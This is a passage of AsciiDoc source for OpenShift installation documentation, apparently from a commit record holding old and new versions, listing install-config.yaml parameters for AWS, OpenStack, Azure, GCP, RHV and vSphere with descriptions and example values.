Custom API endpoints\ncan be specified for EC2, S3, IAM, Elastic Load Balancing, Tagging, Route 53,\nand STS AWS services.\n|Valid link:https:\/\/docs.aws.amazon.com\/general\/latest\/gr\/rande.html[AWS service endpoint] name.\n\n|`platform.aws.serviceEndpoints.url`\n|The AWS service endpoint URL. The URL must use the `https` protocol and the\nhost must trust the certificate.\n|Valid link:https:\/\/docs.aws.amazon.com\/general\/latest\/gr\/rande.html[AWS service endpoint] URL.\n\n|`platform.aws.userTags`\n|A map of keys and values that the installation program adds as tags to all resources that it creates.\n|Any valid YAML map, such as key value pairs in the `<key>: <value>` format. For more information about AWS tags, see link:https:\/\/docs.aws.amazon.com\/AWSEC2\/latest\/UserGuide\/Using_Tags.html[Tagging Your Amazon EC2 Resources] in the AWS documentation.\n\n|`platform.aws.subnets`\n|If you provide the VPC instead of allowing the installation program to create the VPC for you, specify the subnet for the cluster to use. The subnet must be part of the same `machineNetwork[].cidr` ranges that you specify. For a standard cluster, specify a public and a private subnet for each availability zone. For a private cluster, specify a private subnet for each availability zone.\n|Valid subnet IDs.\n\n|====\nendif::aws[]\n\nifdef::osp[]\n.Additional {rh-openstack-first} parameters\n[cols=\".^2m,.^3a,^5a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`compute.platform.openstack.rootVolume.size`\n|For compute machines, the size in gigabytes of the root volume. If you do not set this value, machines use ephemeral storage.\n|Integer, for example `30`.\n\n|`compute.platform.openstack.rootVolume.type`\n|For compute machines, the root volume's type.\n|String, for example `performance`.\n\n|`controlPlane.platform.openstack.rootVolume.size`\n|For control plane machines, the size in gigabytes of the root volume. If you do not set this value, machines use ephemeral storage.\n|Integer, for example `30`.\n\n|`controlPlane.platform.openstack.rootVolume.type`\n|For control plane machines, the root volume's type.\n|String, for example `performance`.\n\n|`platform.openstack.cloud`\n|The name of the {rh-openstack} cloud to use from the list of clouds in the\n`clouds.yaml` file.\n|String, for example `MyCloud`.\n\n|`platform.openstack.externalNetwork`\n|The {rh-openstack} external network name to be used for installation.\n|String, for example `external`.\n\n|`platform.openstack.computeFlavor`\n|The {rh-openstack} flavor to use for control plane and compute machines.\n|String, for example `m1.xlarge`.\n|====\n\n.Optional {rh-openstack} parameters\n[%header, cols=\".^2,.^3,.^5a\"]\n|====\n|Parameter|Description|Values\n\n|`compute.platform.openstack.additionalNetworkIDs`\n|Additional networks that are associated with compute machines. Allowed address pairs are not created for additional networks.\n|A list of one or more UUIDs as strings. For example, `fa806b2f-ac49-4bce-b9db-124bc64209bf`.\n\n|`compute.platform.openstack.additionalSecurityGroupIDs`\n|Additional security groups that are associated with compute machines.\n|A list of one or more UUIDs as strings. For example, `7ee219f3-d2e9-48a1-96c2-e7429f1b0da7`.\n\n|`compute.platform.openstack.zones`\n|{rh-openstack} Compute (Nova) availability zones (AZs) to install machines on. 
If this parameter is not set, the installer relies on the default settings for Nova that the {rh-openstack} administrator configured.\n\nOn clusters that use Kuryr, {rh-openstack} Octavia does not support availability zones. Load balancers and, if you are using the Amphora provider driver, {product-title} services that rely on Amphora VMs, are not created according to the value of this property.\n|A list of strings. For example, `[\"zone-1\", \"zone-2\"]`.\n\n|`controlPlane.platform.openstack.additionalNetworkIDs`\n|Additional networks that are associated with control plane machines. Allowed address pairs are not created for additional networks.\n|A list of one or more UUIDs as strings. For example, `fa806b2f-ac49-4bce-b9db-124bc64209bf`.\n\n|`controlPlane.platform.openstack.additionalSecurityGroupIDs`\n|Additional security groups that are associated with control plane machines.\n|A list of one or more UUIDs as strings. For example, `7ee219f3-d2e9-48a1-96c2-e7429f1b0da7`.\n\n|`controlPlane.platform.openstack.zones`\n|{rh-openstack} Compute (Nova) availability zones (AZs) to install machines on. If this parameter is not set, the installer relies on the default settings for Nova that the {rh-openstack} administrator configured.\n\nOn clusters that use Kuryr, {rh-openstack} Octavia does not support availability zones. Load balancers and, if you are using the Amphora provider driver, {product-title} services that rely on Amphora VMs, are not created according to the value of this property.\n|A list of strings. For example, `[\"zone-1\", \"zone-2\"]`.\n\n|`platform.openstack.clusterOSImage`\n|The location from which the installer downloads the {op-system} image.\n\nYou must set this parameter to perform an installation in a restricted network.\n|An HTTP or HTTPS URL, optionally with an SHA-256 checksum.\n\nFor example, `\\http:\/\/mirror.example.com\/images\/rhcos-43.81.201912131630.0-openstack.x86_64.qcow2.gz?sha256=ffebbd68e8a1f2a245ca19522c16c86f67f9ac8e4e0c1f0a812b068b16f7265d`.\nThe value can also be the name of an existing Glance image, for example `my-rhcos`.\n\n|`platform.openstack.clusterOSImageProperties`\n|Properties to add to the installer-uploaded ClusterOSImage in Glance. This property is ignored if `platform.openstack.clusterOSImage` is set to an existing Glance image.\n\nYou can use this property to exceed the default persistent volume (PV) limit for {rh-openstack} of 26 PVs per node. To exceed the limit, set the `hw_scsi_model` property value to `virtio-scsi` and the `hw_disk_bus` value to `scsi`.\n\nYou can also use this property to enable the QEMU guest agent by including the `hw_qemu_guest_agent` property with a value of `yes`.\n|A list of key-value string pairs. For example, `[\"hw_scsi_model\": \"virtio-scsi\", \"hw_disk_bus\": \"scsi\"]`.\n\n|`platform.openstack.defaultMachinePlatform`\n|The default machine pool platform configuration.\n|\n[source,json]\n----\n{\n \"type\": \"ml.large\",\n \"rootVolume\": {\n \"size\": 30,\n \"type\": \"performance\"\n }\n}\n----\n|`platform.openstack.ingressFloatingIP`\n|An existing floating IP address to associate with the Ingress port. To use this property, you must also define the `platform.openstack.externalNetwork` property.\n|An IP address, for example `128.0.0.1`.\n\n|`platform.openstack.lbFloatingIP`\n|An existing floating IP address to associate with the API load balancer. 
To use this property, you must also define the `platform.openstack.externalNetwork` property.\n|An IP address, for example `128.0.0.1`.\n\n|`platform.openstack.externalDNS`\n|IP addresses for external DNS servers that cluster instances use for DNS resolution.\n|A list of IP addresses as strings. For example, `[\"8.8.8.8\", \"192.168.1.12\"]`.\n\n|`platform.openstack.machinesSubnet`\n|The UUID of a {rh-openstack} subnet that the cluster's nodes use. Nodes and virtual IP (VIP) ports are created on this subnet.\n\nThe first item in `networking.machineNetwork` must match the value of `machinesSubnet`.\n\nIf you deploy to a custom subnet, you cannot specify an external DNS server to the {product-title} installer. Instead, link:https:\/\/access.redhat.com\/documentation\/en-us\/red_hat_openstack_platform\/16.0\/html\/command_line_interface_reference\/subnet[add DNS to the subnet in {rh-openstack}].\n\n|A UUID as a string. For example, `fa806b2f-ac49-4bce-b9db-124bc64209bf`.\n|====\nendif::osp[]\n\nifdef::azure[]\n.Additional Azure parameters\n[cols=\".^2,.^3a,.^3a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`machines.platform.azure.type`\n|The Azure VM instance type.\n|VMs that use Windows or Linux as the operating system. See the\nlink:https:\/\/docs.microsoft.com\/en-us\/azure-stack\/operator\/azure-stack-supported-os?view=azs-1908[Guest operating systems supported on Azure Stack]\nin the Azure documentation.\n\n|`machines.platform.azure.osDisk.diskSizeGB`\n|The Azure disk size for the VM.\n|Integer that represents the size of the disk in GB, for example `512`. The\nminimum supported disk size is `120`.\n\n|`platform.azure.baseDomainResourceGroupName`\n|The name of the resource group that contains the DNS zone for your base domain.\n|String, for example `production_cluster`.\n\n|`platform.azure.outboundType`\n|The outbound routing strategy used to connect your cluster to the internet. If\nyou are using user-defined routing, you must have pre-existing networking\navailable where the outbound routing has already been configured prior to\ninstalling a cluster. The installation program is not responsible for\nconfiguring user-defined routing.\n|`LoadBalancer` or `UserDefinedRouting`. The default is `LoadBalancer`.\n\n|`platform.azure.region`\n|The name of the Azure region that hosts your cluster.\n|Any valid region name, such as `centralus`.\n\n|`platform.azure.zone`\n|List of availability zones to place machines in. For high availability, specify\nat least two zones.\n|List of zones, for example `[\"1\", \"2\", \"3\"]`.\n\n|`platform.azure.networkResourceGroupName`\n|The name of the resource group that contains the existing VNet that you want to deploy your cluster to. This name cannot be the same as the `platform.azure.baseDomainResourceGroupName`.\n|String.\n\n|`platform.azure.virtualNetwork`\n|The name of the existing VNet that you want to deploy your cluster to.\n|String.\n\n|`platform.azure.controlPlaneSubnet`\n|The name of the existing subnet in your VNet that you want to deploy your control plane machines to.\n|Valid CIDR, for example `10.0.0.0\/16`.\n\n|`platform.azure.computeSubnet`\n|The name of the existing subnet in your VNet that you want to deploy your compute machines to.\n|Valid CIDR, for example `10.0.0.0\/16`.\n\n|`platform.azure.cloudName`\n|The name of the Azure cloud environment that is used to configure the Azure SDK with the appropriate Azure API endpoints. 
If empty, the default value `AzurePublicCloud` is used.\n|Any valid cloud environment, such as `AzurePublicCloud` or `AzureUSGovernmentCloud`.\n\n|====\n\n[NOTE]\n====\nYou cannot customize\nlink:https:\/\/azure.microsoft.com\/en-us\/global-infrastructure\/availability-zones\/[Azure Availability Zones]\nor\nlink:https:\/\/docs.microsoft.com\/en-us\/azure\/azure-resource-manager\/resource-group-using-tags[Use tags to organize your Azure resources]\nwith an Azure cluster.\n====\nendif::azure[]\n\n\nifdef::gcp[]\n.Additional Google Cloud Platform (GCP) parameters\n[cols=\".^2,.^3a,.^3a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`platform.gcp.network`\n|The name of the existing VPC that you want to deploy your cluster to.\n|String.\n\n|`platform.gcp.type`\n|The link:https:\/\/cloud.google.com\/compute\/docs\/machine-types[GCP machine type].\n|The GCP machine type.\n\n|`platform.gcp.zones`\n|The availability zones where the installation program creates machines for the specified MachinePool.\n|A list of valid link:https:\/\/cloud.google.com\/compute\/docs\/regions-zones#available[GCP availability zones], such as `us-central1-a`, in a\nlink:https:\/\/yaml.org\/spec\/1.2\/spec.html#sequence\/\/[YAML sequence].\n\n|`platform.gcp.controlPlaneSubnet`\n|The name of the existing subnet in your VPC that you want to deploy your control plane machines to.\n|The subnet name.\n\n|`platform.gcp.computeSubnet`\n|The name of the existing subnet in your VPC that you want to deploy your compute machines to.\n|The subnet name.\n|====\n\nendif::gcp[]\n\nifdef::rhv[]\n\n.Additional {rh-virtualization-first} parameters for clusters\n[cols=\".^2,.^3a,.^3a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`platform.ovirt.ovirt_cluster_id`\n|Required. The Cluster where the VMs will be created.\n|String. For example: `68833f9f-e89c-4891-b768-e2ba0815b76b`\n\n|`platform.ovirt.ovirt_storage_domain_id`\n|Required. The Storage Domain ID where the VM disks will be created.\n|String. For example: `ed7b0f4e-0e96-492a-8fff-279213ee1468`\n\n|`platform.ovirt.ovirt_network_name`\n|Required. The network name where the VM nics will be created.\n|String. For example: `ocpcluster`\n\n|`platform.ovirt.vnicProfileID`\n|Required. The vNIC profile ID of the VM network interfaces. This can be inferred if the cluster network has a single profile.\n|String. For example: `3fa86930-0be5-4052-b667-b79f0a729692`\n\n|`platform.ovirt.api_vip`\n|Required. An IP address on the machine network that will be assigned to the API virtual IP (VIP). You can access the OpenShift API at this endpoint.\n|String. Example: `10.46.8.230`\n\n|`platform.ovirt.ingress_vip`\n|Required. An IP address on the machine network that will be assigned to the Ingress virtual IP (VIP).\n|String. Example: `10.46.8.232`\n|====\n\n\n.Additional {rh-virtualization} parameters for machine pools\n[cols=\".^2,.^3a,.^3a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`<machine-pool>.platform.ovirt.cpu`\n|Optional. Defines the CPU of the VM.\n|Object\n\n|`<machine-pool>.platform.ovirt.cpu.cores`\n|Required if you use `<machine-pool>.platform.ovirt.cpu`. The number of cores. Total virtual CPUs (vCPUs) is cores * sockets.\n|Integer\n\n|`<machine-pool>.platform.ovirt.cpu.sockets`\n|Required if you use `<machine-pool>.platform.ovirt.cpu`. The number of sockets per core. Total virtual CPUs (vCPUs) is cores * sockets.\n|Integer\n\n|`<machine-pool>.platform.ovirt.memoryMB`\n|Optional. 
Memory of the VM in MiB.\n|Integer\n\n|`<machine-pool>.platform.ovirt.instanceTypeID`\n|Optional. An instance type UUID, such as `00000009-0009-0009-0009-0000000000f1`, which you can get from the `https:\/\/<engine-fqdn>\/ovirt-engine\/api\/instancetypes` endpoint.\n|String of UUID\n\n|`<machine-pool>.platform.ovirt.osDisk`\n|Optional. Defines the first and bootable disk of the VM.\n|String\n\n|`<machine-pool>.platform.ovirt.osDisk.sizeGB`\n|Required if you use `<machine-pool>.platform.ovirt.osDisk`. Size of the disk in GiB.\n|Number\n\n|`<machine-pool>.platform.ovirt.vmType`\n|Optional. The VM workload type, such as `high-performance`, `server`, or `desktop`.\n|String\n|====\n\n[NOTE]\n====\nYou can replace `<machine-pool>` with `controlPlane` or `compute`.\n====\n\nendif::rhv[]\n\nifdef::vsphere[]\n.Additional VMware vSphere cluster parameters\n[cols=\".^2,.^3a,.^3a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`platform.vsphere.vCenter`\n|The fully-qualified host name or IP address of the vCenter server.\n|String\n\n|`platform.vsphere.username`\n|The user name to use to connect to the vCenter instance. This user must have at least\nthe roles and privileges that are required for\nlink:https:\/\/vmware.github.io\/vsphere-storage-for-kubernetes\/documentation\/vcp-roles.html[static or dynamic persistent volume provisioning]\nin vSphere.\n|String.\n\n|`platform.vsphere.password`\n|The password for the vCenter user name.\n|String.\n\n|`platform.vsphere.datacenter`\n|The name of the datacenter to use in the vCenter instance.\n|String.\n\n|`platform.vsphere.defaultDatastore`\n|The name of the default datastore to use for provisioning volumes.\n|String.\n\n|`platform.vsphere.folder`\n|_Optional_. The absolute path of an existing folder where the installation program creates the virtual machines. If you do not provide this value, the installation program creates a folder that is named with the infrastructure ID in the datacenter virtual machine folder.\n|String, for example, `\/<datacenter_name>\/vm\/<folder_name>\/<subfolder_name>`.\n\n|`platform.vsphere.network`\n|The network in the vCenter instance that contains the virtual IP addresses and DNS records that you configured.\n|String.\n\n|`platform.vsphere.cluster`\n|The vCenter cluster to install the {product-title} cluster in.\n|String.\n\n|`platform.vsphere.apiVIP`\n|The virtual IP (VIP) address that you configured for control plane API access.\n|An IP address, for example `128.0.0.1`.\n\n|`platform.vsphere.ingressVIP`\n|The virtual IP (VIP) address that you configured for cluster ingress.\n|An IP address, for example `128.0.0.1`.\n|====\n\n.Optional VMware vSphere machine pool parameters\n[cols=\".^2,.^3a,.^3a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`platform.vsphere.osDisk.diskSizeGB`\n|The size of the disk in gigabytes.\n|Integer.\n\n|`platform.vsphere.cpus`\n|The total number of virtual processor cores to assign a virtual machine.\n|Integer.\n\n|`platform.vsphere.coresPerSocket`\n|The number of cores per socket in a virtual machine. The number of virtual sockets on the virtual machine is `platform.vsphere.cpus`\/`platform.vsphere.coresPerSocket`. 
The default value is `1`\n|Integer.\n\n|`platform.vsphere.memoryMB`\n|The size of a virtual machine's memory in megabytes.\n|Integer.\n|====\n\nendif::vsphere[]\n\nifeval::[\"{context}\" == \"installing-aws-customizations\"]\n:!aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-government-region\"]\n:!aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-network-customizations\"]\n:!aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-private\"]\n:!aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-vpc\"]\n:!aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-customizations\"]\n:!azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-government-region\"]\n:!azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-network-customizations\"]\n:!azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-private\"]\n:!azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-vnet\"]\n:!azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-gcp-customizations\"]\n:!gcp:\nendif::[]\nifeval::[\"{context}\" == \"installing-gcp-private\"]\n:!gcp:\nendif::[]\nifeval::[\"{context}\" == \"installing-gcp-network-customizations\"]\n:!gcp:\nendif::[]\nifeval::[\"{context}\" == \"installing-gcp-vpc\"]\n:!gcp:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-customizations\"]\n:!aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-installer-custom\"]\n:!osp:\n:!osp-custom:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-installer-kuryr\"]\n:!osp:\n:!osp-kuryr:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-user\"]\n:!osp:\n:!osp-custom:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-user-kuryr\"]\n:!osp:\n:!osp-kuryr:\nendif::[]\nifeval::[\"{context}\" == \"installing-rhv-customizations\"]\n:!rhv:\nendif::[]\nifeval::[\"{context}\" == \"installing-vsphere-installer-provisioned-customizations\"]\n:!vsphere:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-installer-restricted\"]\n:!osp:\n:!osp-custom:\nendif::[]\n","old_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * installing\/installing_aws\/installing-aws-customizations.adoc\n\/\/ * installing\/installing_aws\/installing-aws-government-region.adoc\n\/\/ * installing\/installing_aws\/installing-aws-network-customizations.adoc\n\/\/ * installing\/installing_aws\/installing-aws-private.adoc\n\/\/ * installing\/installing_aws\/installing-aws-vpc.adoc\n\/\/ * installing\/installing_azure\/installing-azure-customizations.adoc\n\/\/ * installing\/installing_azure\/installing-azure-government-region.adoc\n\/\/ * installing\/installing_azure\/installing-azure-network-customizations.adoc\n\/\/ * installing\/installing_azure\/installing-azure-private.adoc\n\/\/ * installing\/installing_azure\/installing-azure-vnet.adoc\n\/\/ * installing\/installing_gcp\/installing-gcp-customizations.adoc\n\/\/ * installing\/installing_gcp\/installing-gcp-private.adoc\n\/\/ * installing\/installing_gcp\/installing-gcp-network-customizations.adoc\n\/\/ * installing\/installing_gcp\/installing-gcp-vpc.adoc\n\/\/ * installing\/installing_openstack\/installing-openstack-installer-custom.adoc\n\/\/ * installing\/installing_openstack\/installing-openstack-installer-kuryr.adoc\n\/\/ * installing\/installing_openstack\/installing-openstack-user.adoc\n\/\/ * installing\/installing_openstack\/installing-openstack-user-kuryr.adoc\n\/\/ * installing\/installing_rhv\/installing-rhv-custom.adoc\n\/\/ * 
installing\/installing_vsphere\/installing-vsphere-installer-provisioned-customizations.adoc\n\nifeval::[\"{context}\" == \"installing-aws-customizations\"]\n:aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-government-region\"]\n:aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-network-customizations\"]\n:aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-private\"]\n:aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-vpc\"]\n:aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-customizations\"]\n:azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-government-region\"]\n:azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-network-customizations\"]\n:azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-private\"]\n:azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-vnet\"]\n:azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-gcp-customizations\"]\n:gcp:\nendif::[]\nifeval::[\"{context}\" == \"installing-gcp-private\"]\n:gcp:\nendif::[]\nifeval::[\"{context}\" == \"installing-gcp-network-customizations\"]\n:gcp:\nendif::[]\nifeval::[\"{context}\" == \"installing-gcp-vpc\"]\n:gcp:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-customizations\"]\n:aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-installer-custom\"]\n:osp:\n:osp-custom:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-installer-kuryr\"]\n:osp:\n:osp-kuryr:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-user\"]\n:osp:\n:osp-custom:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-user-kuryr\"]\n:osp:\n:osp-kuryr:\nendif::[]\nifeval::[\"{context}\" == \"installing-rhv-customizations\"]\n:rhv:\nendif::[]\nifeval::[\"{context}\" == \"installing-vsphere-installer-provisioned-customizations\"]\n:vsphere:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-installer-restricted\"]\n:osp:\n:osp-custom:\nendif::[]\n\n\n[id=\"installation-configuration-parameters_{context}\"]\n= Installation configuration parameters\n\nBefore you deploy an {product-title} cluster, you provide parameter values to describe your account on the cloud platform that hosts your cluster and optionally customize your cluster's platform. When you create the `install-config.yaml` installation configuration file, you provide values for the required parameters through the command line. If you customize your cluster, you can modify the `install-config.yaml` file to provide more details about the platform.\n\n[NOTE]\n====\nAfter installation, you cannot modify these parameters in the `install-config.yaml` file.\n====\n\n.Required parameters\n[cols=\".^2,.^3,.^5a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`apiVersion`\n|The API version for the `install-config.yaml` content. The current version is `v1`. The installer may also support older API versions.\n|String\n\n|`baseDomain`\n|The base domain of your cloud provider. The base domain is used to create routes to your {product-title} cluster components. The full DNS name for your cluster is a combination of the `baseDomain` and `metadata.name` parameter values that uses the `<metadata.name>.<baseDomain>` format.\n|A fully-qualified domain or subdomain name, such as `example.com`.\n\n|`metadata`\n|Kubernetes resource `ObjectMeta`, from which only the `name` parameter is consumed.\n|Object\n\n|`metadata.name`\n|The name of the cluster. 
DNS records for the cluster are all subdomains of `{{.metadata.name}}.{{.baseDomain}}`.\n|String of lowercase letters, hyphens (`-`), and periods (`.`), such as `dev`.\nifdef::osp[]\nThe string must be 14 characters or fewer.\nendif::osp[]\n\n|`platform`\n|The configuration for the specific platform upon which to perform the installation: `aws`, `baremetal`, `azure`, `openstack`, `ovirt`, `vsphere`. For additional information about `platform.<platform>` parameters, consult the following table for your specific platform.\n|Object\n\nifndef::openshift-origin[]\n|`pullSecret`\n|Get this pull secret from link:https:\/\/cloud.redhat.com\/openshift\/install\/pull-secret[] to authenticate downloading container images for {product-title} components from services such as Quay.io.\n|\n[source,json]\n----\n{\n \"auths\":{\n \"cloud.openshift.com\":{\n \"auth\":\"b3Blb=\",\n \"email\":\"you@example.com\"\n },\n \"quay.io\":{\n \"auth\":\"b3Blb=\",\n \"email\":\"you@example.com\"\n }\n }\n}\n----\nendif::[]\n\n|====\n\n.Optional parameters\n[cols=\".^2,.^3a,.^3a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`additionalTrustBundle`\n|A PEM-encoded X.509 certificate bundle that is added to the nodes' trusted certificate store. This trust bundle may also be used when a proxy has been configured.\n|String\n\n|`compute`\n|The configuration for the machines that comprise the compute nodes.\n|Array of machine-pool objects. For details, see the following \"Machine-pool\" table.\n\n|`compute.architecture`\n|Determines the instruction set architecture of the machines in the pool. Currently, heterogeneous clusters are not supported, so all pools must specify the same architecture. Valid values are `amd64` (the default).\n|String\n\n|`compute.hyperthreading`\n|Whether to enable or disable simultaneous multithreading, or `hyperthreading`, on compute machines. By default, simultaneous multithreading is enabled to increase the performance of your machines' cores.\n[IMPORTANT]\n====\nIf you disable simultaneous multithreading, ensure that your capacity planning\naccounts for the dramatically decreased machine performance.\n====\n|`Enabled` or `Disabled`\n\n|`compute.name`\n|Required if you use `compute`. The name of the machine pool.\n|`worker`\n\n|`compute.platform`\n|Required if you use `compute`. Use this parameter to specify the cloud provider to host the worker machines. This parameter value must match the `controlPlane.platform` parameter value.\n|`aws`, `azure`, `gcp`, `openstack`, `ovirt`, `vsphere`, or `{}`\n\n|`compute.replicas`\n|The number of compute machines, which are also known as worker machines, to provision.\n|A positive integer greater than or equal to `2`. The default value is `3`.\n\n|`controlPlane`\n|The configuration for the machines that comprise the control plane.\n|Array of `MachinePool` objects. For details, see the following \"Machine-pool\" table.\n\n|`controlPlane.architecture`\n|Determines the instruction set architecture of the machines in the pool. Currently, heterogeneous clusters are not supported, so all pools must specify the same architecture. Valid values are `amd64` (the default).\n|String\n\n|`controlPlane.hyperthreading`\n|Whether to enable or disable simultaneous multithreading, or `hyperthreading`, on control plane machines. 
By default, simultaneous multithreading is enabled to increase the performance of your machines' cores.\n[IMPORTANT]\n====\nIf you disable simultaneous multithreading, ensure that your capacity planning\naccounts for the dramatically decreased machine performance.\n====\n|`Enabled` or `Disabled`\n\n|`controlPlane.name`\n|Required if you use `controlPlane`. The name of the machine pool.\n|`master`\n\n|`controlPlane.platform`\n|Required if you use `controlPlane`. Use this parameter to specify the cloud provider that hosts the control plane machines. This parameter value must match the `compute.platform` parameter value.\n|`aws`, `azure`, `gcp`, `openstack`, `ovirt`, `vsphere`, or `{}`\n\n|`controlPlane.replicas`\n|The number of control plane machines to provision.\n|The only supported value is `3`, which is the default value.\n\n|`credentialsMode`\n|The Cloud Credential Operator (CCO) mode. If no mode is specified, the CCO dynamically tries to determine the capabilities of the provided credentials, with a preference for mint mode on the platforms where multiple modes are supported.\n[NOTE]\n====\nNot all CCO modes are supported for all cloud providers. For more information on CCO modes, see the _Cloud Credential Operator_ entry in the _Red Hat Operators reference_ content.\n====\n|`Mint`, `Passthrough`, `Manual`, or an empty string (`\"\"`).\n\n|`fips`\n|Enable or disable FIPS mode. The default is `false` (disabled). If FIPS mode is enabled, the {op-system-first} machines that {product-title} runs on bypass the default Kubernetes cryptography suite and use the cryptography modules that are provided with {op-system} instead.\n|`false` or `true`\n\n|`imageContentSources`\n|Sources and repositories for the release-image content.\n|Array of objects. Includes a `source` and, optionally, `mirrors`, as described in the following rows of this table.\n\n|`imageContentSources.source`\n|Required if you use `imageContentSources`. Specify the repository that users refer to, for example, in image pull specifications.\n|String\n\n|`imageContentSources.mirrors`\n|Specify one or more repositories that may also contain the same images.\n|Array of strings\n\n|`networking`\n|The configuration for the pod network provider in the cluster.\n|Object\n\n|`networking.clusterNetwork`\n|The IP address pools for pods. The default is `10.128.0.0\/14` with a host prefix of `\/23`.\n|Array of objects\n\n|`networking.clusterNetwork.cidr`\n|Required if you use `networking.clusterNetwork`. The IP block address pool.\n|IP network. IP networks are represented as strings using Classless Inter-Domain Routing (CIDR) notation with a traditional IP address or network number, followed by the forward slash (\/) character, followed by a decimal value between 0 and 32 that describes the number of significant bits. For example, `10.0.0.0\/16` represents IP addresses `10.0.0.0` through `10.0.255.255`.\n\n|`networking.clusterNetwork.hostPrefix`\n|Required if you use `networking.clusterNetwork`. The prefix size to allocate to each node from the CIDR. For example, 24 would allocate 2^8=256 addresses to each node.\n|Integer\n\n|`networking.machineNetwork`\n|The IP address pools for machines.\n|Array of objects\n\n|`networking.machineNetwork.cidr`\n|Required if you use `networking.machineNetwork`. The IP block address pool. The default is `10.0.0.0\/16` for all platforms other than libvirt. For libvirt, the default is `192.168.126.0\/24`.\n|IP network. 
IP networks are represented as strings using Classless Inter-Domain Routing (CIDR) notation with a traditional IP address or network number, followed by the forward slash (\/) character, followed by a decimal value between 0 and 32 that describes the number of significant bits. For example, `10.0.0.0\/16` represents IP addresses `10.0.0.0` through `10.0.255.255`.\n\n|`networking.networkType`\n|The type of network to install. The default is `OpenShiftSDN`.\n|String\n\n|`networking.serviceNetwork`\n|The IP address pools for services. The default is `172.30.0.0\/16`.\n|Array of IP networks. IP networks are represented as strings using Classless Inter-Domain Routing (CIDR) notation with a traditional IP address or network number, followed by the forward slash (\/) character, followed by a decimal value between 0 and 32 that describes the number of significant bits. For example, `10.0.0.0\/16` represents IP addresses `10.0.0.0` through `10.0.255.255`.\n\n|`publish`\n|How to publish or expose the user-facing endpoints of your cluster, such as the Kubernetes API, OpenShift routes.\n|`Internal` or `External`. To deploy a private cluster, which cannot be accessed from the internet, set `publish` to `Internal`. The default value is `External`.\n\n|`sshKey`\n| The SSH key or keys to authenticate access to your cluster machines.\n[NOTE]\n====\nFor production {product-title} clusters on which you want to perform installation debugging or disaster recovery, specify an SSH key that your `ssh-agent` process uses.\n====\na|One or more keys. For example:\n```\nsshKey:\n key1...\n key2...\n key3...\n```\n|====\n\n\nifdef::aws[]\n.Optional AWS parameters\n[cols=\".^2,.^3,.^5a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`compute.platform.aws.amiID`\n|The AWS AMI used to boot compute machines for the cluster. This is required for regions that require a custom {op-system} AMI.\n|Any published or custom {op-system} AMI that belongs to the set AWS region.\n\n|`compute.platform.aws.rootVolume.iops`\n|The Input\/Output Operations Per Second (IOPS) that is reserved for the root volume.\n|Integer, for example `4000`.\n\n|`compute.platform.aws.rootVolume.size`\n|The size in GiB of the root volume.\n|Integer, for example `500`.\n\n|`compute.platform.aws.rootVolume.type`\n|The instance type of the root volume.\n|Valid link:https:\/\/docs.aws.amazon.com\/AWSEC2\/latest\/UserGuide\/EBSVolumeTypes.html[AWS EBS instance type],\nsuch as `io1`.\n\n|`compute.platform.aws.type`\n|The EC2 instance type for the compute machines.\n|Valid link:https:\/\/aws.amazon.com\/ec2\/instance-types\/[AWS instance type], such as `c5.9xlarge`.\n\n|`compute.platform.aws.zones`\n|The availability zones where the installation program creates machines for the compute machine pool. If you provide your own VPC, you must provide a subnet in that availability zone.\n|A list of valid AWS availability zones, such as `us-east-1c`, in a\nlink:https:\/\/yaml.org\/spec\/1.2\/spec.html#sequence\/\/[YAML sequence].\n\n|`compute.aws.region`\n|The AWS region that the installation program creates compute resources in.\n|Any valid link:https:\/\/docs.aws.amazon.com\/general\/latest\/gr\/rande.html[AWS region], such as `us-east-1`.\n\n|`controlPlane.platform.aws.amiID`\n|The AWS AMI used to boot control plane machines for the cluster. 
